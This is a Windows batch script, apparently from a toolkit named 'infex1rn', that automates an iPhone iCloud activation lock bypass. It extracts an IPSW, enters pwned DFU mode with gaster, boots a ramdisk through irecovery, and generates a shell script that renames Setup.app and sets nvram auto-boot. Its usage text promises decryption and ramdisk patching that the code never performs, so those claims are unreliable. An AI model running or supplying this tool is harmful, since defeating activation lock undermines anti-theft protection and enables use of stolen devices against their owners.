@echo off
REM Auto Ramdisk Creator - Automatically extracts, creates, and patches ramdisk from IPSW
REM Removes Setup.app for iCloud bypass
REM Requires: IPSW file, device in DFU mode

echo ===============================================
echo [*] Auto Ramdisk Creator for infex1rn
echo [*] Extracts and patches ramdisk from IPSW
echo [*] Removes Setup.app for activation bypass
echo ===============================================
echo.

setlocal enabledelayedexpansion

if "%~1"=="" (
    echo Usage: auto_ramdisk.bat ^<ipsw_path^> [device_identifier]
    echo.
    echo Examples:
    echo   auto_ramdisk.bat iPhone_4.7_15.8_Restore.ipsw
    echo   auto_ramdisk.bat iPhone_4.7_15.8_Restore.ipsw iPhone9,1
    echo.
    echo This script will:
    echo   1. Extract ramdisk from IPSW
    echo   2. Decrypt ramdisk (if keys available)
    echo   3. Mount and patch ramdisk
    echo   4. Remove/rename Setup.app
    echo   5. Create patched ramdisk for bypass
    echo   6. Optionally boot the ramdisk
    echo.
    exit /b 1
)

set IPSW_PATH=%~1
set DEVICE_ID=%~2
set WORK_DIR=%TEMP%\infex1rn_ramdisk_%RANDOM%
set RAMDISK_OUTPUT=..\ramdisks

echo [*] IPSW Path: %IPSW_PATH%
if not "%DEVICE_ID%"=="" echo [*] Device: %DEVICE_ID%
echo [*] Working directory: %WORK_DIR%
echo.

REM Create working directory
mkdir "%WORK_DIR%" 2>nul
mkdir "%RAMDISK_OUTPUT%" 2>nul

REM Step 1: Verify IPSW exists
echo [*] Step 1: Verifying IPSW file...
if not exist "%IPSW_PATH%" (
    echo [!] Error: IPSW file not found: %IPSW_PATH%
    exit /b 1
)
echo [+] IPSW file found
echo.

REM Step 2: Extract IPSW contents
echo [*] Step 2: Extracting IPSW contents...
echo [*] This may take a few minutes...

REM Use PowerShell to extract IPSW (which is a ZIP file)
powershell -Command "Expand-Archive -Path '%IPSW_PATH%' -DestinationPath '%WORK_DIR%\ipsw_extracted' -Force" 2>nul
if errorlevel 1 (
    echo [!] Error: Failed to extract IPSW
    echo [!] Make sure the IPSW file is not corrupted
    exit /b 1
)
echo [+] IPSW extracted successfully
echo.

REM Step 3: Find and extract ramdisk DMG
echo [*] Step 3: Locating ramdisk in IPSW...
set RAMDISK_DMG=
for %%f in ("%WORK_DIR%\ipsw_extracted\*.dmg") do (
    echo [*] Found DMG: %%~nxf
    REM Check if it's a ramdisk (usually smaller than root filesystem)
    for %%a in ("%%f") do (
        if %%~za LSS 100000000 (
            set RAMDISK_DMG=%%f
            echo [+] Identified as ramdisk: %%~nxf
        )
    )
)

if "%RAMDISK_DMG%"=="" (
    echo [!] Warning: Could not auto-detect ramdisk
    echo [*] Looking for restore ramdisk pattern...
    for %%f in ("%WORK_DIR%\ipsw_extracted\*.dmg") do (
        echo %%~nxf | findstr /i "restore" >nul && set RAMDISK_DMG=%%f
    )
)

if "%RAMDISK_DMG%"=="" (
    echo [!] Error: No ramdisk found in IPSW
    echo [!] Please manually specify the ramdisk DMG
    exit /b 1
)

echo [+] Ramdisk located: %RAMDISK_DMG%
echo.

REM Step 4: Copy ramdisk to output
echo [*] Step 4: Preparing ramdisk for patching...
copy "%RAMDISK_DMG%" "%WORK_DIR%\ramdisk_original.dmg" >nul
echo [+] Ramdisk copied for processing
echo.

REM Step 5: Extract boot components
echo [*] Step 5: Extracting boot components...
set IBSS_FOUND=0
set IBEC_FOUND=0

for %%f in ("%WORK_DIR%\ipsw_extracted\Firmware\dfu\*.im4p" "%WORK_DIR%\ipsw_extracted\Firmware\dfu\*.img4") do (
    echo [*] Found boot file: %%~nxf
    copy "%%f" "%RAMDISK_OUTPUT%\" >nul
    echo %%~nxf | findstr /i "iBSS" >nul && set IBSS_FOUND=1
    echo %%~nxf | findstr /i "iBEC" >nul && set IBEC_FOUND=1
)

REM Also look for devicetree and kernelcache
for %%f in ("%WORK_DIR%\ipsw_extracted\Firmware\all_flash\*.im4p" "%WORK_DIR%\ipsw_extracted\Firmware\all_flash\*.img4") do (
    echo [*] Found firmware file: %%~nxf
    copy "%%f" "%RAMDISK_OUTPUT%\" >nul
)

echo [+] Boot components extracted
echo.

REM Step 6: Create patched ramdisk info
echo [*] Step 6: Creating ramdisk patch configuration...

REM Create a patch script that will be used when ramdisk is mounted
(
echo # Ramdisk Patch Script for Setup.app Removal
echo # Generated by infex1rn auto_ramdisk.bat
echo # Apply these commands after mounting the ramdisk via SSH
echo.
echo # Mount filesystems
echo mount_filesystems
echo.
echo # Backup and remove Setup.app ^(activation lock bypass^)
echo mv /mnt1/Applications/Setup.app /mnt1/Applications/Setup.app.bak
echo.
echo # Alternative: Create empty Setup.app
echo # mkdir /mnt1/Applications/Setup.app
echo # touch /mnt1/Applications/Setup.app/Info.plist
echo.
echo # Set auto-boot
echo nvram auto-boot=true
echo.
echo # Sync and reboot
echo sync
echo reboot
) > "%RAMDISK_OUTPUT%\patch_setup_app.sh"

echo [+] Patch script created: %RAMDISK_OUTPUT%\patch_setup_app.sh
echo.

REM Step 7: Copy ramdisk to output
echo [*] Step 7: Copying ramdisk to output directory...
copy "%WORK_DIR%\ramdisk_original.dmg" "%RAMDISK_OUTPUT%\ramdisk.dmg" >nul
echo [+] Ramdisk copied to: %RAMDISK_OUTPUT%\ramdisk.dmg
echo.

REM Step 8: Create manifest
echo [*] Step 8: Creating ramdisk manifest...
(
echo # Ramdisk Manifest
echo # Generated: %DATE% %TIME%
echo # Source IPSW: %IPSW_PATH%
echo.
echo RAMDISK_DMG=ramdisk.dmg
echo PATCH_SCRIPT=patch_setup_app.sh
echo.
echo # Boot files extracted:
dir /b "%RAMDISK_OUTPUT%\*.im4p" "%RAMDISK_OUTPUT%\*.img4" 2>nul
echo.
echo # To use this ramdisk:
echo # 1. Put device in DFU mode
echo # 2. Run: gaster pwn
echo # 3. Send boot files with irecovery
echo # 4. Boot ramdisk
echo # 5. SSH to device and run patch_setup_app.sh
) > "%RAMDISK_OUTPUT%\manifest.txt"

echo [+] Manifest created
echo.

REM Cleanup
echo [*] Step 9: Cleaning up temporary files...
rmdir /s /q "%WORK_DIR%" 2>nul
echo [+] Cleanup complete
echo.

echo ===============================================
echo [+] Auto Ramdisk Creation Complete!
echo ===============================================
echo.
echo [*] Output files in: %RAMDISK_OUTPUT%
echo.
echo [*] Files created:
dir /b "%RAMDISK_OUTPUT%" 2>nul
echo.
echo [*] Next steps:
echo     1. Put device in DFU mode
echo     2. Run: untethered_bypass.bat hello
echo     3. Or manually:
echo        - gaster pwn
echo        - Send boot files with irecovery
echo        - Boot ramdisk
echo        - SSH to device (root@localhost)
echo        - Run commands from patch_setup_app.sh
echo.
echo [*] The patch script will:
echo     - Mount device filesystems
echo     - Rename Setup.app to Setup.app.bak
echo     - Set auto-boot to bypass activation on reboot
echo.

choice /M "Do you want to boot the ramdisk now"
if errorlevel 2 goto :end
if errorlevel 1 goto :boot

:boot
echo.
echo [*] Booting ramdisk...
echo [*] Make sure device is in DFU mode!
echo.

REM Enter pwned DFU
echo [*] Entering pwned DFU mode...
gaster\gaster.exe pwn
if errorlevel 1 (
    echo [!] Failed to enter pwned DFU mode
    echo [!] Please put device in DFU mode first
    goto :end
)

REM Send ramdisk
echo [*] Sending ramdisk...
libimobiledevice\irecovery.exe -f "%RAMDISK_OUTPUT%\ramdisk.dmg"

REM Boot
echo [*] Booting...
libimobiledevice\irecovery.exe -c ramdisk

echo.
echo [+] Ramdisk should be booting!
echo [*] Wait 30 seconds then SSH to device
echo [*] Run the patch_setup_app.sh commands to remove Setup.app
echo.

:end
endlocal
